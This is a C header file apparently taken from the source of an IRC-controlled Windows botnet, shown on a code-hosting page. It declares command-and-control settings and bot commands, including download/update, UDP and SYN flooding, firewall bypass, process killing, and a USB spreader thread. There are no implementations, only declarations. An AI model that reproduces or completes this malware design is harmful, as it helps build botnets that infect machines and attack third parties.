-
Notifications
You must be signed in to change notification settings - Fork 16
/
Copy pathexterns.h
62 lines (49 loc) · 1.46 KB
/
externs.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
extern char cfg_mutex[];
extern unsigned long cfg_reconnectsleep; // msec
extern unsigned long cfg_ircmaxwaittime; // sec
//configurable info
extern char cfg_host[];
extern unsigned short cfg_port;
extern char cfg_srvpass[];
extern char cfg_hostname[];
extern char cfg_channel[];
extern char cfg_chanpass[];
extern char cfg_p[];
extern char ChanSafe[];
extern thread_s threads[MAX_THREADS];
extern char cfg_servicename[];
extern char cfg_mutex[];
extern char cfg_filename[];
//commands
extern char cmd_ver[];
extern char cmd_join[];
extern char cmd_part[];
extern char cmd_sort[];
extern char cmd_unsort[];
extern char cmd_protect[];
extern char cmd_protectleave[];
extern char cmd_download[];
extern char cmd_update[];
extern char cmd_uninstall[];
extern char cmd_clean[];
extern char cmd_msn[];
extern char cmd_torrent[];
extern char cmd_popup[];
extern char cmd_udp[];
extern char cmd_ssyn[];
//installation stuff
extern char fbyp[];
extern char szRegname[];
extern char gotopth[];
extern char exename[];
extern char installrand[];
extern int fwlbypass(char* bot);
extern int killproc(char* exename);
extern int view_(char* website);
extern bool IsNew();
extern HANDLE xetum;
extern char versionInfo[];
//Threads
DWORD WINAPI USB_Spreader(LPVOID param);
DWORD WINAPI view(LPVOID param);
DWORD WINAPI cHTTP(LPVOID param);